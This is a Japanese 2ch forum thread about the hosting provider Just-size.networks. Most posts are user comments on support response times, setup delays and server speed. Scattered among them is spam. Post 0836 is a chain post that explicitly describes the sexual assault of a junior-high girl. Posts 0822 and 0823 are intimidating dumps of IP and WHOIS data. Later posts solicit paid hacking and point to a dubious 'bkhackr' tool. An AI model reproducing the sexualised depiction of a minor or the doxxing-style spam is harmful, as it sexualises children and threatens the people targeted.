X



【ハッキングされたよ】Just-size.networks Part.7
レス数が900を超えています。1000を超えると表示できなくなるよ。
0001名無しさん@お腹いっぱい。
垢版 |
2007/04/21(土) 18:50:100
Just-size.networksについて語るスレです。

【公式】
http://www.just-size.net/

サブドメイン形式。独自ドメインも可。
同人アダルト可能(申告制)

【過去スレ】
Part1: http://pc5.2ch.net/test/read.cgi/hosting/1082205734/
Part2: http://pc5.2ch.net/test/read.cgi/hosting/1092571331/
Part3: http://pc5.2ch.net/test/read.cgi/hosting/1096524700/
Part4 : http://pc8.2ch.net/test/read.cgi/hosting/1098029474/
Part5 : http://pc8.2ch.net/test/read.cgi/hosting/1126220484/

サポートフォーラム
http://forum.soyokaze.info:8080/
よくある質問と回答
http://www.just-size.net/faq/
ネクションサーブ合資会社
http://www.ns-i.net/
0806名無しさん@お腹いっぱい。
垢版 |
2010/02/25(木) 04:43:520
話題が無いほど安定してる。
0807名無しさん@お腹いっぱい。
垢版 |
2010/02/27(土) 20:05:530
■■■■■■■■■■■■■■■■
■                     ■  違う板にコピペすると、四角の枠の中に
■                     ■  メッセージとURLが現れる不思議な絵。
■                     ■
■                     ■  (その仕組みがリンク先に書いてある)
■                     ■
■                     ■  この原理を応用すると、まったく新しい
■                     ■  コピペが作れる予感。
■■■■■■■■■■■■■■■■
0808名無しさん@お腹いっぱい。
垢版 |
2010/03/04(木) 20:07:55P
public_htmlのパーミッションを教えてください。
削除してしまいましたorz
0811名無しさん@お腹いっぱい。
垢版 |
2010/04/18(日) 12:14:480
新規申し込んだわけだが、
土日に構築しようとおもったのに返事がこないな。
他鯖はすぐ試用できたんだが。
0815名無しさん@お腹いっぱい。
垢版 |
2010/06/28(月) 15:27:540
問い合わせの返事が4営業日すぎて来なかったので再送した。
が、まだ来ないまま1営業日が過ぎようとしている。
前同じ問い合わせしたときはその日のうちに即返事くれたんだけどなあ。
0817名無しさん@お腹いっぱい。
垢版 |
2010/06/28(月) 22:27:480
>>816
まじで。
なんか問い合わせ方法に不備があったとしても対応できない旨の返事くらいほしい……。
まだこねーよ。まじどうなってんだ?
0820名無しさん@お腹いっぱい。
垢版 |
2010/06/29(火) 14:48:360
twitter除いてみたらメール遅延のお知らせ出てたの気づいた。
そして返信も貰った。
これで安心して寝れる!
0822名無しさん@お腹いっぱい。
垢版 |
2010/07/05(月) 02:42:400
■一般的情報
IPアドレス 112.68.89.153
ホスト名 112-68-89-153.eonet.ne.jp
ブラウザの種類 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IPアドレス割当国 日本 ( jp )

市外局番 該当なし
接続回線 光
都道府県 該当なし
■Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 112.68.0.0/17
b. [ネットワーク名] K-OPTICOM
f. [組織名] 株式会社ケイ・オプティコム
g. [Organization] K-Opticom Corporation
m. [管理者連絡窓口] JP00014196
n. [技術連絡担当者] JP00014196
p. [ネームサーバ] ns1.eonet.ne.jp
p. [ネームサーバ] ns7.eonet.ne.jp
[最終更新] 2009/02/02 17:05:19(JST)
[割り振り] 112.68.0.0/14
株式会社ケイ・オプティコム (K-Opticom Corporation)
■攻撃被害
[ 総当り侵入  Sniffer  DoSアタック 掲示板荒らし ]
0823名無しさん@お腹いっぱい。
垢版 |
2010/07/05(月) 02:44:070
■一般的情報
IPアドレス 122.16.182.11
ホスト名 p3011-ipbf607souka.saitama.ocn.ne.jp
IPアドレス割当国 日本 ( jp )

市外局番 該当なし
接続回線 光
都道府県 埼玉県
■Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 122.16.128.0/17
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] TT15086JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] TT10660JP
p. [ネームサーバ] ns-kg002.ocn.ad.jp
p. [ネームサーバ] ns-kn002.ocn.ad.jp
[最終更新] 2008/06/24 13:08:09(JST)
[割り振り] 122.16.0.0/12
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
■攻撃被害
[ Spoof パスワードクラック Flagment Trojan ]
0824名無しさん@お腹いっぱい。
垢版 |
2010/07/08(木) 00:54:550
サーバーもホームページもつながんね。どうしたのかな?
0829名無しさん@お腹いっぱい。:
垢版 |
2010/09/21(火) 12:17:080
サイト移転を考えてお試し期間中なんだが
テキストページでも表示までに一呼吸分くらいかかる
sd012サーバーで負荷は特に無い様なんだが
他サーバーがサクサクいけてた分重く感じる これって普通?
0832名無しさん@お腹いっぱい。
垢版 |
2010/09/28(火) 21:22:090
sd003の新参者ですが、こちらの解析って結構ログイン出来ない事があるのかな?
パスが認証されたりされなかったりがあるんだけど、ずっと使われてる方どうですか?
最近同じような事で何度か問い合わせしたからサポートに訊きづらくて…
0836名無しさん
垢版 |
2010/10/03(日) 20:42:410
昨日、クラスメイトにムリヤリエッチされちゃいました。
私は、中1です。
友達の、女子2人と、男子2人で一人の男子の家にいったんだ♪
そしたら、急に男子が家に鍵をして、5人みんなで、(女子も)私を取り押さえて、服を脱がせました。
男子は私のまんこを舐めたり、おっぱいをもんだりしゃぶったりして、
女子はヤられている私の写真を撮ってたの(恥)
その、写真を見たい人は、3カ所にはってください♥
そしたら、ここ→【見てみて♥】が、クリックできるようになるよ
0837名無しさん@お腹いっぱい。
垢版 |
2010/11/18(木) 18:03:380
ここのサポート早すぎるんですけど。
暇なの?
お客さん少なすぎて倒産しちゃったりするんじゃないか不安になる。
0840名無しさん@お腹いっぱい。
垢版 |
2010/11/27(土) 15:54:100
今でこそ営業日単位になったが、深夜3時でも問い合わせメールすると2分半ほどで返事が来てビビったことが何度もある。
当時は遅くても10時間程度で返信が来てた。対応も親切だし他所に移る気がしない。
唯一の問題点は・・・・・・・・・・・・・・昔はスタッフの自己紹介ページとかいろいろあったのに、それがなくなってお楽しみが減ったことだ

http://web.archive.org/web/20050427173315/cc.jsn.cc/img/promotion2.swf
0843名無しさん@お腹いっぱい。
垢版 |
2010/11/28(日) 19:08:360
ウッス!
0844名無しさん@お腹いっぱい。
垢版 |
2010/11/29(月) 17:29:490
26日夜に申し込んでみた。
ログ読んでいつ連絡くるかなとwktkしてたんだが、今は

お申し込みを確認致しました。
只今大変混みあっており、セットアップ作業開始までお時間を頂戴しております。
恐れ入りますが、今しばらくお待ち下さい。

だそうなw
通常は一営業日以内に使えるようになるみたいなんだけど、いつ返事が来るかな
0846名無しさん@お腹いっぱい。
垢版 |
2010/12/13(月) 05:07:180
常識範囲であっても、以前からの利用者としては遅く感じてしまう
それだけ神ががり的に対応が早かった
もちろんそんなことをいつまでも続けていれば体を壊してしまう
早さは仕方ないとしても、対応の親切さ細やかさは維持してほしい
でないとJSNを利用してる意味がなくなってしまう
もうすぐ更新時期だがもちろん更新するつもりだ
0851名無しさん@お腹いっぱい。
垢版 |
2011/02/27(日) 14:09:54.170
/i               iヽ 
  ! !、      ___        / ノ 
  ヽ ヽ、 ,彡フ ̄  ̄ヽミミ、/ / 
   ヽ フ''         く /   
    _ 〉'           ヽ/,_ 
   (ヽi,      /;ヽ       i/ ) 
    i ! ,,_____ノ、i;;iヽ、_____、 i i  同じ板にコピペするとそのままだけど
     ! 'ヽ__●ノ' 'ヽ_●,ノ ,ノ i  違う板にコピペするとかわいい美少女の顔
    !、jヽ、 ,-   ;; -、 / _ノ  に変わる摩訶不思議な鬼コピペ。
     〉 /,、''`ヽ__/` ' ,、'  )  
     '!, ヽ`t-,、__, -'イ/  /
     ヽ ヽt,=,='='=イi  /  
      \ `'"~⌒~"' ノ   
        `-- ^--


0861名無しさん@お腹いっぱい。
垢版 |
2011/05/05(木) 06:36:29.450
昔のように、おもしろいページ作ってほしいな
今のは事務的になってつまらない
いい意味で崩れてるところが好きだったんだけどな
0866名無しさん@お腹いっぱい。
垢版 |
2011/07/28(木) 11:42:49.450
2chの板の避難所作りたかったんだけど
掲示板のみのサイトは禁止事項にひっかかる。借りたかったのに残念
0869 忍法帖【Lv=20,xxxPT】
垢版 |
2011/09/12(月) 16:34:35.270
保守いるか?
一年以上書き込みがないスレが残ってる板だぞ、ここ
同人板辺りと勘違いしてないか?
0882名無しさん@お腹いっぱい。
垢版 |
2012/02/18(土) 22:22:43.380
はじめはよくわからんで使い始めたけど、支払いにペイパル使えるのが便利だと思った
対応も早いし特に不満はないなあ
0884名無しさん@お腹いっぱい。
垢版 |
2012/02/22(水) 16:26:48.630
もう何年も前から契約してるけど、本当に書くことないくらい何もない。
なので、たまに何かあっても苦情言うほどにも感じない。
唯一面倒なのが更新のときの手続き、と、感じるくらい何もない。
0885ゴッツ
垢版 |
2012/02/22(水) 17:03:45.160
ハッキングできる人いませんか?
0887カカ
垢版 |
2012/02/22(水) 23:09:55.780
ハッキングしてくれたらなんでも買う
0888名無しさん@お腹いっぱい。
垢版 |
2012/02/22(水) 23:27:49.460
晒しage
0889カカ
垢版 |
2012/02/22(水) 23:30:53.250
どういう意味
0891カカ
垢版 |
2012/02/22(水) 23:34:34.550
どの位ハッキングできますか?
0895初心者名無し
垢版 |
2012/03/22(木) 22:10:00.800
あのですねえそんなにハッキングしたいならbkhackrというソフトでチャカ
チャカしたらいいよこんなハッキングというスレには、あいたくないお。(^ω^)
0896(´∀`)(・∀・)
垢版 |
2012/03/22(木) 22:20:28.500
何言ってんのバカかアホか糞か頭病気?一回手術してもらったら
0897(´∀`)(・∀・)
垢版 |
2012/03/22(木) 22:23:38.060
何言ってんのバカかアホか糞か頭病気?一回手術してもらったら
0898(´∀`)(・∀・)
垢版 |
2012/03/22(木) 22:30:22.230
bkhackrのダウンロードサイト知ってるよ
http./youareanidiot/org
0900(´∀`)(・∀・)
垢版 |
2012/03/22(木) 22:34:59.150
俺も昨日やったけど俺のパソコンwindows7だったから増えたり何もならんかった
0904じいちゃん ◆bmOLUEjKyc
垢版 |
2012/05/14(月) 17:17:26.530
ちょっと みちを たずねたいんじゃが
だれか おらんかの? 笑顔
0905名無しさん@お腹いっぱい。
垢版 |
2012/05/15(火) 02:50:05.32O

白い人肉カプセルの成分…クールー病

パプア・ニューギニアのある限られた部族*1で、発生していた脳(自律神経、筋肉)の伝染病。クロイツフェルト・ヤコブ病の一種。
石器時代〜20世紀(主に1960年代まで)にこの部族の死者を弔うためにその死体を食する習慣があり、そのときに死者の体内に蓄積されたプリオン(悪性の蛋白質)を摂取してしまい発病する事が解明された。
脳など、多くプリオンが蓄積されている部位を食するのは女性や子供の役割であるため、女性や子供の発症例が多い。
発病潜伏期間が長く、50年という例も報告されているため、人食の習慣が禁止された現在でも患者は発生しているらしい。
「クールー」とは現地の言葉で「震える」という意味。
この病気を発症すると自律神経に異常をきたし、筋肉のコントロールができなくなる。
歩行困難や、腕や足などが硬直、筋肉の震えが止まらなくなることもある。
また、筋肉の異常だけでなく、脳にも症状が現れ、痴呆、記憶力の減退や感情が激しく乱れるなどする。
さらに発症後1年程度で死に至る病気とされている。
レス数が900を超えています。1000を超えると表示できなくなるよ。